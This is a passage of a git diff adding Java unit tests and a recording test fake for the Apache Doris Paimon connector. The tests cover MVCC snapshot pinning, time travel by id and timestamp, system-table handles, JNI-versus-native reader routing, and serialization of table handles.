keeping the MvccTable wiring engaged. This mirrors + // legacy PaimonExternalTable, which seeded latestSnapshotId = PaimonSnapshot.INVALID_SNAPSHOT_ID + // (-1) and only overwrote it when latestSnapshot().isPresent(). + // MUTATION 1: returning Optional.empty() for an empty table -> .get() throws / assertTrue + // below red. MUTATION 2: defaulting to 0L (or any value != -1) instead of -1 -> id != -1 red. + Assertions.assertEquals(-1L, snap.getSnapshotId(), + "an empty table must pin with the legacy INVALID_SNAPSHOT_ID (-1), not Optional.empty"); + } + + @Test + public void beginQuerySnapshotSysHandleReturnsEmpty() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = sysHandle(ops); + // Even with a non-empty latest snapshot configured, a sys handle must short-circuit to empty. + ops.latestSnapshotId = OptionalLong.of(7L); + + Assertions.assertFalse(metadataWith(ops).beginQuerySnapshot(null, handle).isPresent(), + "a system table must NOT expose an MVCC begin-query pin"); + // WHY: system tables (e.g. t$snapshots) are synthetic metadata views and MUST NOT participate + // in MVCC / time-travel — pinning them to a data snapshot is meaningless and mirrors the T19 + // scan-node fail-loud guard that rejects time-travel on sys tables. MUTATION: dropping the + // isSystemTable() guard -> the seam runs and a non-empty snapshot (id 7) is returned -> the + // assertFalse above + the no-seam-call assertion below go red. + Assertions.assertTrue(ops.log.isEmpty(), + "a sys handle must short-circuit before touching the MVCC seam"); + } + + // ==================== getSnapshotById ==================== + + @Test + public void getSnapshotByIdExistsReturnsSnapshot() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = normalHandle(ops); + ops.snapshotExists = true; + + ConnectorMvccSnapshot snap = metadataWith(ops).getSnapshotById(null, handle, 99L).get(); + + // WHY: time-travel-by-id must echo the requested id when that snapshot exists. MUTATION: + // returning empty even when the snapshot exists -> .get() throws -> red. + Assertions.assertEquals(99L, snap.getSnapshotId(), + "an existing snapshot id must be pinned verbatim"); + } + + @Test + public void getSnapshotByIdNotExistsReturnsEmpty() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = normalHandle(ops); + ops.snapshotExists = false; // SDK FileNotFoundException -> seam reports false + + // WHY: the SPI contract is "or empty if none" (ConnectorMetadata.getSnapshotById Javadoc), so + // a missing id must degrade to Optional.empty(), NOT throw. (Legacy THREW a UserException; + // surfacing the user-facing "not found" message is now the B5 fe-core consumer's job — a + // documented, intentional contract difference.) MUTATION: throwing / returning a non-empty + // snapshot for a missing id -> isPresent() true -> red. + Assertions.assertFalse(metadataWith(ops).getSnapshotById(null, handle, 99L).isPresent(), + "a missing snapshot id must yield Optional.empty (SPI empty-if-none)"); + } + + @Test + public void getSnapshotByIdSysHandleReturnsEmpty() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = sysHandle(ops); + ops.snapshotExists = true; // would yield a snapshot if the guard were missing + + Assertions.assertFalse(metadataWith(ops).getSnapshotById(null, handle, 5L).isPresent(), + "a system table must NOT expose time-travel-by-id"); + // MUTATION: dropping the isSystemTable() guard -> snapshotExists=true yields a snapshot -> + // red; the empty log also proves the guard short-circuits before the seam. + Assertions.assertTrue(ops.log.isEmpty(), + "a sys handle must short-circuit before touching the MVCC seam"); + } + + // ==================== getSnapshotAt ==================== + + @Test + public void getSnapshotAtFoundReturnsSnapshotId() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = normalHandle(ops); + ops.snapshotIdAtOrBefore = OptionalLong.of(17L); + + ConnectorMvccSnapshot snap = metadataWith(ops).getSnapshotAt(null, handle, 1_000L).get(); + + // WHY: time-travel-by-timestamp must pin the id of the latest snapshot at-or-before the + // wall-clock time (legacy earlierOrEqualTimeMills). MUTATION: returning the timestamp instead + // of the resolved snapshot id, or empty -> id != 17 / .get() throws -> red. + Assertions.assertEquals(17L, snap.getSnapshotId(), + "the timestamp must resolve to the at-or-before snapshot's id"); + } + + @Test + public void getSnapshotAtNoneReturnsEmpty() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = normalHandle(ops); + ops.snapshotIdAtOrBefore = OptionalLong.empty(); // no snapshot <= ts (SDK returned null) + + // WHY: when no snapshot is at-or-before the timestamp the SPI contract is empty-if-none (same + // documented difference vs legacy, which threw with the earliest-snapshot hint). MUTATION: + // throwing / returning a snapshot for the no-match case -> isPresent() true -> red. + Assertions.assertFalse(metadataWith(ops).getSnapshotAt(null, handle, 1_000L).isPresent(), + "no snapshot at-or-before the timestamp must yield Optional.empty"); + } + + @Test + public void getSnapshotAtSysHandleReturnsEmpty() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = sysHandle(ops); + ops.snapshotIdAtOrBefore = OptionalLong.of(3L); + + Assertions.assertFalse(metadataWith(ops).getSnapshotAt(null, handle, 1_000L).isPresent(), + "a system table must NOT expose time-travel-by-timestamp"); + Assertions.assertTrue(ops.log.isEmpty(), + "a sys handle must short-circuit before touching the MVCC seam"); + } + + // ==================== capabilities ==================== + + @Test + public void connectorDeclaresMvccAndTimeTravelCapabilities() { + // PaimonConnector is unit-constructable: getCapabilities() does NOT touch the catalog (the + // catalog is created lazily on first getMetadata/getScanPlanProvider call), so a null-config + // connector with a recording context suffices. + ConnectorContext ctx = new RecordingConnectorContext(); + Set caps = new PaimonConnector(Collections.emptyMap(), ctx).getCapabilities(); + + // WHY: B5's fe-core MvccTable wiring keys off these capabilities to decide whether paimon + // tables expose MVCC pinning and FOR TIME TRAVEL / FOR VERSION AS OF. If they were absent + // (the inherited Connector default = emptySet), the E5 methods above would never be called. + // MUTATION: leaving getCapabilities() unoverridden (empty set) -> both assertions red. + Assertions.assertTrue(caps.contains(ConnectorCapability.SUPPORTS_MVCC_SNAPSHOT), + "paimon must declare SUPPORTS_MVCC_SNAPSHOT"); + Assertions.assertTrue(caps.contains(ConnectorCapability.SUPPORTS_TIME_TRAVEL), + "paimon must declare SUPPORTS_TIME_TRAVEL"); + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataSysTableTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataSysTableTest.java new file mode 100644 index 00000000000000..9bc936df111285 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataSysTableTest.java @@ -0,0 +1,365 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.doris.connector.api.ConnectorColumn; +import org.apache.doris.connector.api.ConnectorTableSchema; +import org.apache.doris.connector.api.handle.ConnectorColumnHandle; +import org.apache.doris.connector.api.handle.ConnectorTableHandle; + +import org.apache.paimon.table.system.SystemTableLoader; +import org.apache.paimon.types.DataTypes; +import org.apache.paimon.types.RowType; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.util.ArrayList; +import java.util.Arrays; +import java.util.Collections; +import java.util.List; +import java.util.Map; +import java.util.Optional; + +/** + * Tests for the paimon E7 system-table capability (P5-T17): {@code listSupportedSysTables}, + * {@code getSysTableHandle}, and the sys-aware schema/columns reload path. + * + *

    Like the other metadata tests these drive a {@link RecordingPaimonCatalogOps} fake with a + * {@code null} real catalog, so they stay entirely offline (no live remote paimon). + */ +public class PaimonConnectorMetadataSysTableTest { + + private static PaimonConnectorMetadata metadataWith(RecordingPaimonCatalogOps ops) { + return new PaimonConnectorMetadata(ops, Collections.emptyMap(), new RecordingConnectorContext()); + } + + private static RowType rowType(String... columnNames) { + RowType.Builder builder = RowType.builder(); + for (String name : columnNames) { + builder.field(name, DataTypes.INT()); + } + return builder.build(); + } + + private static PaimonTableHandle baseHandle() { + return new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()); + } + + @Test + public void listSupportedSysTablesReturnsSdkSystemTables() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + + List result = metadataWith(ops).listSupportedSysTables(null, baseHandle()); + + // WHY: the set of selectable "$sys" tables a user sees per paimon table IS exactly the + // paimon SDK's SystemTableLoader.SYSTEM_TABLES (legacy PaimonSysTable.SUPPORTED_SYS_TABLES + // is built from that same list). If this drifted, users could no longer reference e.g. + // mytable$snapshots. MUTATION: returning Collections.emptyList() (the SPI default) -> red. + Assertions.assertFalse(result.isEmpty(), "supported sys tables must be non-empty"); + Assertions.assertTrue(result.contains("snapshots"), + "the SDK system-table list must include 'snapshots'"); + Assertions.assertEquals(new ArrayList<>(SystemTableLoader.SYSTEM_TABLES), result, + "must mirror the paimon SDK SystemTableLoader.SYSTEM_TABLES exactly"); + } + + @Test + public void getSysTableHandleResolvesViaFourArgSysIdentifierBranchMain() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.sysTable = new FakePaimonTable("t1$snapshots", + rowType("snapshot_id", "schema_id"), + Collections.emptyList(), Collections.emptyList()); + + Optional opt = + metadataWith(ops).getSysTableHandle(null, baseHandle(), "snapshots"); + + Assertions.assertTrue(opt.isPresent(), "a supported sys table must yield a handle"); + PaimonTableHandle handle = (PaimonTableHandle) opt.get(); + // WHY: the sys table MUST be loaded through the EXISTING getTable seam using the 4-arg sys + // Identifier (db, table, branch="main", systemTable=sysName) — that is how paimon's catalog + // dispatches to the system table rather than the base table. The branch is hardcoded + // "main" for legacy parity (PaimonSysExternalTable#getSysPaimonTable). MUTATION: building a + // 2-arg Identifier.create(db,table) (dropping the sys name) -> getSystemTableName() null, + // branch null -> red; also the wrong (base) table would be resolved. + Assertions.assertNotNull(ops.lastGetTableId, "the getTable seam must have been called"); + Assertions.assertEquals("snapshots", ops.lastGetTableId.getSystemTableName(), + "the seam must be called with a 4-arg sys Identifier carrying the sys-table name"); + Assertions.assertEquals("main", ops.lastGetTableId.getBranchName(), + "the sys Identifier branch must be hardcoded 'main' (legacy parity)"); + Assertions.assertEquals("db1", ops.lastGetTableId.getDatabaseName()); + // getTableName() is the BARE base table ("t1"); getObjectName() would be "t1$snapshots". + Assertions.assertEquals("t1", ops.lastGetTableId.getTableName()); + + // WHY: the handle must self-describe as a sys table carrying the sys name and the resolved + // sys Table; downstream schema/column reads and (T19) scan routing depend on these. + // MUTATION: PaimonTableHandle.forSystemTable not setting sysTableName -> isSystemTable() + // false -> red. + Assertions.assertTrue(handle.isSystemTable(), "the returned handle must be a sys handle"); + Assertions.assertEquals("snapshots", handle.getSysTableName()); + Assertions.assertSame(ops.sysTable, handle.getPaimonTable(), + "the resolved sys Table must be stashed as the transient ref"); + } + + @Test + public void getSysTableHandleSnapshotsIsNotForceJni() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.sysTable = new FakePaimonTable("t1$snapshots", + rowType("snapshot_id"), Collections.emptyList(), Collections.emptyList()); + + PaimonTableHandle handle = (PaimonTableHandle) metadataWith(ops) + .getSysTableHandle(null, baseHandle(), "snapshots").get(); + + // WHY: only binlog/audit_log are NAME-forced to JNI (legacy + // PaimonScanNode.shouldForceJniForSystemTable). Metadata sys tables like 'snapshots' must + // NOT be name-forced here — their reader is decided by split type at scan time (T19). Over- + // forcing would push metadata tables through JNI even when a native path applies. MUTATION: + // hardcoding forceJni=true -> red. + Assertions.assertFalse(handle.isForceJni(), + "metadata sys table 'snapshots' must not be name-forced to JNI"); + } + + @Test + public void getSysTableHandleBinlogAndAuditLogAreForceJni() { + for (String sysName : new String[] {"binlog", "audit_log"}) { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.sysTable = new FakePaimonTable("t1$" + sysName, + rowType("c0"), Collections.emptyList(), Collections.emptyList()); + + PaimonTableHandle handle = (PaimonTableHandle) metadataWith(ops) + .getSysTableHandle(null, baseHandle(), sysName).get(); + + // WHY: binlog/audit_log are the two sys tables legacy name-forces to the JNI reader + // (PaimonScanNode.shouldForceJniForSystemTable). The hint must travel on the handle so + // T19 routing can honor it. MUTATION: dropping the binlog/audit_log check (forceJni + // always false) -> red. + Assertions.assertTrue(handle.isForceJni(), + sysName + " must be name-forced to JNI (legacy parity)"); + } + } + + @Test + public void getSysTableHandleForceJniIsCaseInsensitive() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.sysTable = new FakePaimonTable("t1$BINLOG", + rowType("c0"), Collections.emptyList(), Collections.emptyList()); + + PaimonTableHandle handle = (PaimonTableHandle) metadataWith(ops) + .getSysTableHandle(null, baseHandle(), "BINLOG").get(); + + // WHY: legacy uses equalsIgnoreCase for both the supported-name check and the force-JNI + // check, so "BINLOG"/"Binlog" must behave identically to "binlog". MUTATION: switching to + // case-sensitive equals -> "BINLOG" treated as not-force-JNI (and could even be rejected) + // -> red. + Assertions.assertTrue(handle.isSystemTable(), + "a case-different supported sys name must still resolve"); + Assertions.assertTrue(handle.isForceJni(), + "force-JNI must match the sys name case-insensitively"); + // WHY: legacy SysTable renders the suffix as "$" + sysTableName.toLowerCase() + // (SysTable.java:53), so the STORED handle name must be canonical lowercase — otherwise + // t$BINLOG and t$binlog become distinct handles (distinct equals/hashCode/toString and a + // distinct sys Identifier), splitting plan/cache identity. MUTATION: storing sysName + // verbatim -> getSysTableName() == "BINLOG" -> red. + Assertions.assertEquals("binlog", handle.getSysTableName(), + "the stored sys name must be normalized to lowercase (legacy parity)"); + Assertions.assertEquals("binlog", ops.lastGetTableId.getSystemTableName(), + "the sys Identifier must carry the lowercased canonical name"); + } + + @Test + public void getSysTableHandleMixedCaseYieldsCanonicalLowercaseHandle() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.sysTable = new FakePaimonTable("t1$SnapShots", + rowType("snapshot_id"), Collections.emptyList(), Collections.emptyList()); + + PaimonTableHandle mixed = (PaimonTableHandle) metadataWith(ops) + .getSysTableHandle(null, baseHandle(), "SnapShots").get(); + + // WHY: handle identity parity — a mixed-case input must canonicalize so that the handle + // built from "SnapShots" is interchangeable with one built from "snapshots" (same name, + // toString, sys Identifier). This is what prevents two cache/plan keys for one sys table. + // MUTATION: storing sysName verbatim -> getSysTableName() == "SnapShots", toString ends in + // "$SnapShots", Identifier carries "SnapShots" -> all three asserts red. + Assertions.assertEquals("snapshots", mixed.getSysTableName(), + "mixed-case input must canonicalize to lowercase"); + Assertions.assertEquals("db1.t1$snapshots", mixed.toString(), + "toString must render the canonical lowercase suffix"); + Assertions.assertEquals("snapshots", ops.lastGetTableId.getSystemTableName(), + "the sys Identifier must carry the lowercased canonical name"); + } + + @Test + public void getSysTableHandleNullNameReturnsEmptyWithoutSeamCall() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + + Optional opt = + metadataWith(ops).getSysTableHandle(null, baseHandle(), null); + + // WHY: the Javadoc contract is "or empty if not exposed" — a null sysName is simply not an + // exposed sys table, so it must return Optional.empty() (not NPE on toLowerCase / not a + // remote seam call). MUTATION: removing the null-guard in isSupportedSysTable -> NPE in + // equalsIgnoreCase or the later toLowerCase -> red (test would error instead of pass). + Assertions.assertFalse(opt.isPresent(), "a null sys name must yield Optional.empty()"); + Assertions.assertTrue(ops.log.isEmpty(), + "a null sys name must short-circuit before touching the seam"); + } + + @Test + public void getSysTableHandleUnknownNameReturnsEmptyWithoutSeamCall() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + + Optional opt = + metadataWith(ops).getSysTableHandle(null, baseHandle(), "not_a_sys_table"); + + // WHY: an unsupported name is "this connector does not expose that sys table" (empty), not + // an error — and, per design, we must not even hit the remote seam for an unknown name (it + // would be a wasted/failing remote call). MUTATION: removing the isSupportedSysTable guard + // -> the seam is called -> log non-empty -> red. + Assertions.assertFalse(opt.isPresent(), "an unknown sys name must yield Optional.empty()"); + Assertions.assertTrue(ops.log.isEmpty(), + "an unsupported sys name must short-circuit before touching the seam"); + } + + @Test + public void getSysTableHandleTableNotExistReturnsEmpty() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.throwTableNotExist = true; + + Optional opt = + metadataWith(ops).getSysTableHandle(null, baseHandle(), "snapshots"); + + // WHY: if the base table is gone the sys table cannot exist either; this must degrade to + // Optional.empty(), NOT propagate the checked TableNotExistException to the SPI caller. + // MUTATION: removing the TableNotExistException catch -> the checked exception escapes -> + // red. This branch is only forceable with a recording fake. + Assertions.assertFalse(opt.isPresent()); + } + + @Test + public void getTableSchemaForSysHandleBuildsColumnsFromSysRowType() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + // The BASE table has different columns than the SYS table; using the base table's rowType + // for a sys handle would be a silent bug, so they are deliberately different here. + ops.table = new FakePaimonTable("t1", + rowType("id", "name"), Collections.emptyList(), Collections.emptyList()); + FakePaimonTable sys = new FakePaimonTable("t1$snapshots", + rowType("snapshot_id", "schema_id", "commit_kind"), + Collections.emptyList(), Collections.emptyList()); + + PaimonTableHandle sysHandle = PaimonTableHandle.forSystemTable( + "db1", "t1", "snapshots", false); + sysHandle.setPaimonTable(sys); + + ConnectorTableSchema schema = metadataWith(ops).getTableSchema(null, sysHandle); + + // WHY: a sys handle's schema MUST come from the SYSTEM table's rowType, not the base + // table's. MUTATION: getTableSchema hardcoding the 2-arg base Identifier / base table would + // surface ["id","name"] -> red. + List columnNames = new ArrayList<>(); + for (ConnectorColumn c : schema.getColumns()) { + columnNames.add(c.getName()); + } + Assertions.assertEquals(Arrays.asList("snapshot_id", "schema_id", "commit_kind"), columnNames, + "sys-handle schema must be built from the system table's row type"); + } + + @Test + public void getColumnHandlesForSysHandleReloadsViaFourArgSysIdentifier() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + // Base table (would be served for a 2-arg Identifier) has DIFFERENT columns than the sys + // table, so a wrong-Identifier reload is detectable. + ops.table = new FakePaimonTable("t1", + rowType("id"), Collections.emptyList(), Collections.emptyList()); + ops.sysTable = new FakePaimonTable("t1$snapshots", + rowType("snapshot_id", "schema_id"), + Collections.emptyList(), Collections.emptyList()); + + // A deserialized sys handle: sysTableName set, transient Table lost (null). + PaimonTableHandle sysHandle = PaimonTableHandle.forSystemTable( + "db1", "t1", "snapshots", false); + Assertions.assertNull(sysHandle.getPaimonTable(), "precondition: transient table is null"); + + Map handles = + metadataWith(ops).getColumnHandles(null, sysHandle); + + // WHY: when the transient sys Table is lost (serialization round-trip), the reload MUST use + // the 4-arg sys Identifier so the SYSTEM table is re-fetched, not the base table. MUTATION: + // resolveTable always using Identifier.create(db,table) for the reload -> base columns + // ["id"] -> red. The captured Identifier's sys name proves the correct reload path. + Assertions.assertEquals(Arrays.asList("snapshot_id", "schema_id"), + new ArrayList<>(handles.keySet()), + "sys-handle columns must come from the system table's row type after reload"); + Assertions.assertNotNull(ops.lastGetTableId, "reload must have hit the seam"); + Assertions.assertEquals("snapshots", ops.lastGetTableId.getSystemTableName(), + "the reload must use the 4-arg sys Identifier (not the 2-arg base Identifier)"); + } + + @Test + public void sysHandleSurvivesJavaSerializationRoundTrip() throws Exception { + // Build a sys handle WITH a transient Table set, exactly as getSysTableHandle returns it. + FakePaimonTable sys = new FakePaimonTable("t1$binlog", + rowType("c0"), Collections.emptyList(), Collections.emptyList()); + PaimonTableHandle original = PaimonTableHandle.forSystemTable("db1", "t1", "binlog", true); + original.setPaimonTable(sys); + + // Real Java serialization round-trip (the FE/BE / plan-reuse wire mechanism). + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + try (ObjectOutputStream oos = new ObjectOutputStream(baos)) { + oos.writeObject(original); + } + PaimonTableHandle restored; + try (ObjectInputStream ois = new ObjectInputStream( + new ByteArrayInputStream(baos.toByteArray()))) { + restored = (PaimonTableHandle) ois.readObject(); + } + + // WHY: the whole sys-aware reload-fallback (FIX 1 / metadata twin) only matters BECAUSE the + // sys identity (sysTableName, forceJni) is genuinely persisted across serialization while + // the live Table is NOT. This test proves both halves: the non-transient fields survive + // (so the deserialized handle still self-describes as binlog/force-JNI and can reload its + // OWN sys Table via the 4-arg Identifier) and the transient Table is dropped (so the reload + // path is actually exercised, never serving a stale base table). MUTATION: marking + // sysTableName transient -> getSysTableName() null + isSystemTable() false after deserialize + // -> red; (separately) making paimonTable non-transient -> getPaimonTable() != null -> red. + Assertions.assertTrue(restored.isSystemTable(), + "a deserialized sys handle must still be a sys handle (sysTableName non-transient)"); + Assertions.assertEquals("binlog", restored.getSysTableName(), + "the (lowercased) sys name must survive serialization"); + Assertions.assertTrue(restored.isForceJni(), + "the forceJni hint must survive serialization (non-transient)"); + Assertions.assertNull(restored.getPaimonTable(), + "the resolved Table must be transient — dropped on deserialize, forcing a reload"); + } + + @Test + public void sysHandleNotEqualToBaseHandle() { + PaimonTableHandle base = baseHandle(); + PaimonTableHandle sys = PaimonTableHandle.forSystemTable("db1", "t1", "snapshots", false); + + // WHY: a sys handle (db1.t1$snapshots) and its base handle (db1.t1) are DISTINCT tables to + // the engine; if they compared equal, plan/cache keying could collide and serve base rows + // for a sys-table query. sysTableName is therefore part of identity. MUTATION: dropping + // sysTableName from equals/hashCode -> base.equals(sys) true -> red. + Assertions.assertNotEquals(base, sys, "a sys handle must not equal its base handle"); + Assertions.assertNotEquals(base.hashCode(), sys.hashCode(), + "distinct identities should (here) hash differently"); + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java index ce61dff9c319f9..83547fe8f67a86 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java @@ -18,12 +18,15 @@ package org.apache.doris.connector.paimon; import org.apache.paimon.table.Table; +import org.apache.paimon.table.source.RawFile; import org.apache.paimon.types.DataTypes; import org.apache.paimon.types.RowType; import org.junit.jupiter.api.Assertions; import org.junit.jupiter.api.Test; +import java.util.Arrays; import java.util.Collections; +import java.util.Optional; /** * Tests for {@link PaimonScanPlanProvider#resolveTable}, pinning the transient-Table reload @@ -76,6 +79,89 @@ public void resolveTableReloadsWhenTransientTableNull() { "reload-fallback must re-fetch the table from the seam when the transient ref is null"); } + @Test + public void resolveTableForSysHandleReloadsViaFourArgSysIdentifier() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + // Base table (served for a 2-arg Identifier) has DIFFERENT columns than the sys table, so a + // wrong-Identifier reload (base table) is detectable by the captured Identifier's sys name. + ops.table = new FakePaimonTable( + "t1", rowType("id"), Collections.emptyList(), Collections.emptyList()); + ops.sysTable = new FakePaimonTable( + "t1$snapshots", rowType("snapshot_id", "schema_id"), + Collections.emptyList(), Collections.emptyList()); + + // A deserialized SYSTEM handle: sysTableName set, transient Table lost (null) — exactly the + // FE/BE serialization or plan-reuse case the scan path must survive. + PaimonTableHandle sysHandle = PaimonTableHandle.forSystemTable( + "db1", "t1", "snapshots", false); + Assertions.assertNull(sysHandle.getPaimonTable(), "precondition: transient table is null"); + + PaimonScanPlanProvider provider = new PaimonScanPlanProvider(Collections.emptyMap(), ops); + Table resolved = provider.resolveTable(sysHandle); + + // WHY: BLOCKER fix — the scan path's own resolveTable used to ALWAYS reload via the 2-arg + // base Identifier, so a deserialized sys handle would silently resolve and scan the BASE + // table (wrong rows) instead of the system table. The reload must be sys-aware (4-arg sys + // Identifier), mirroring the metadata side, via the single shared PaimonTableResolver. + // MUTATION: reverting the scan resolveTable to Identifier.create(db,table) -> the base table + // is returned, the captured Identifier's sys name is null -> red. + Assertions.assertSame(ops.sysTable, resolved, + "scan path must reload the SYSTEM table (not the base table) for a sys handle"); + Assertions.assertNotNull(ops.lastGetTableId, "reload must have hit the seam"); + Assertions.assertEquals("snapshots", ops.lastGetTableId.getSystemTableName(), + "the scan reload must use the 4-arg sys Identifier carrying the sys-table name"); + Assertions.assertEquals("main", ops.lastGetTableId.getBranchName(), + "the sys Identifier branch must be hardcoded 'main' (legacy parity)"); + } + + /** Builds a native-eligible RawFile (parquet suffix). The numeric fields are irrelevant to the + * native-vs-JNI routing decision under test, only the path suffix matters. */ + private static RawFile parquetRawFile(String path) { + return new RawFile(path, 0L, 100L, 100L, "parquet", 0L, 0L); + } + + @Test + public void forceJniSysTableSplitDoesNotTakeNativePathEvenWithRawFiles() { + // A binlog/audit_log sys handle: forceJni=true. Its DataSplit WOULD support native (raw + // parquet files present), but the binlog/audit_log read semantics (pack/merge, rowkind/ + // sequence-number projection) are not reproducible by the native ORC/Parquet reader. + Optional> rawFiles = Optional.of( + Arrays.asList(parquetRawFile("/data/part-0.parquet"))); + + // WHY: legacy forces binlog/audit_log to JNI (PaimonScanNode.shouldForceJniForSystemTable, + // captured as handle.isForceJni()). Without the gate the native path would silently return + // wrong rows. MUTATION: dropping the `!forceJni` guard in shouldUseNativeReader -> + // returns true here (native) -> red. + Assertions.assertFalse( + PaimonScanPlanProvider.shouldUseNativeReader(/*forceJni*/ true, rawFiles), + "a forceJni (binlog/audit_log) sys split must route to JNI, never native, " + + "even when its raw files would otherwise support the native reader"); + } + + @Test + public void nonForcedSplitWithRawFilesStillTakesNativePath() { + // A normal table (or a non-forced DataTable sys table like "ro"): forceJni=false. With raw + // files that support the native reader, it must still be allowed the native path. + Optional> rawFiles = Optional.of( + Arrays.asList(parquetRawFile("/data/part-0.parquet"))); + + // WHY: the gate must be the forceJni flag ONLY — over-forcing JNI for non-forced splits + // would regress the native fast path for normal tables and "ro". MUTATION: gating native on + // anything stricter (e.g. isSystemTable) -> returns false here -> red. + Assertions.assertTrue( + PaimonScanPlanProvider.shouldUseNativeReader(/*forceJni*/ false, rawFiles), + "a non-forced split with native-eligible raw files must still take the native path"); + } + + @Test + public void nonForcedSplitWithoutNativeFilesTakesJni() { + // Sanity: even when not forced, a split whose raw files are absent must not go native. + // MUTATION: making shouldUseNativeReader ignore supportNativeReader -> returns true -> red. + Assertions.assertFalse( + PaimonScanPlanProvider.shouldUseNativeReader(/*forceJni*/ false, Optional.empty()), + "a split without convertible raw files must route to JNI regardless of forceJni"); + } + @Test public void resolveTableUsesTransientWithoutReload() { RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingPaimonCatalogOps.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingPaimonCatalogOps.java index 488a1da1a44567..6dd8e30c4d7087 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingPaimonCatalogOps.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingPaimonCatalogOps.java @@ -27,6 +27,7 @@ import java.util.ArrayList; import java.util.List; import java.util.Map; +import java.util.OptionalLong; /** * Hand-written recording fake for {@link PaimonCatalogOps} (no Mockito), mirroring the @@ -47,6 +48,15 @@ final class RecordingPaimonCatalogOps implements PaimonCatalogOps { Table table; List partitions = new ArrayList<>(); + /** The Identifier the metadata layer passed to the most recent {@link #getTable} call. */ + Identifier lastGetTableId; + /** + * Optional override returned by {@link #getTable} when the requested Identifier carries a + * system-table name (4-arg sys Identifier). When unset, {@link #table} is returned for both + * base and sys lookups. + */ + Table sysTable; + boolean throwDatabaseNotExist; boolean throwTableNotExist; @@ -70,6 +80,13 @@ final class RecordingPaimonCatalogOps implements PaimonCatalogOps { boolean throwDatabaseNotEmpty; boolean throwDatabaseNotExistOnDrop; + // ---- T20 E5 MVCC seam: configurable lookup results (no real Snapshot/SnapshotManager) ---- + OptionalLong latestSnapshotId = OptionalLong.empty(); + OptionalLong snapshotIdAtOrBefore = OptionalLong.empty(); + boolean snapshotExists; + /** The table the metadata layer passed to the most recent MVCC seam call. */ + Table lastMvccTable; + @Override public List listDatabases() { log.add("listDatabases"); @@ -99,9 +116,15 @@ public List listTables(String databaseName) throws Catalog.DatabaseNotEx @Override public Table getTable(Identifier identifier) throws Catalog.TableNotExistException { log.add("getTable:" + identifier.getFullName()); + lastGetTableId = identifier; if (throwTableNotExist) { throw new Catalog.TableNotExistException(identifier); } + // A 4-arg sys Identifier carries a non-null system-table name; serve sysTable when set so + // sys-handle schema/columns can be built from a DIFFERENT rowType than the base table. + if (sysTable != null && identifier.getSystemTableName() != null) { + return sysTable; + } return table; } @@ -164,6 +187,27 @@ public void dropTable(Identifier identifier, boolean ignoreIfNotExists) } } + @Override + public OptionalLong latestSnapshotId(Table table) { + log.add("latestSnapshotId"); + lastMvccTable = table; + return latestSnapshotId; + } + + @Override + public OptionalLong snapshotIdAtOrBefore(Table table, long timestampMillis) { + log.add("snapshotIdAtOrBefore:" + timestampMillis); + lastMvccTable = table; + return snapshotIdAtOrBefore; + } + + @Override + public boolean snapshotExists(Table table, long snapshotId) { + log.add("snapshotExists:" + snapshotId); + lastMvccTable = table; + return 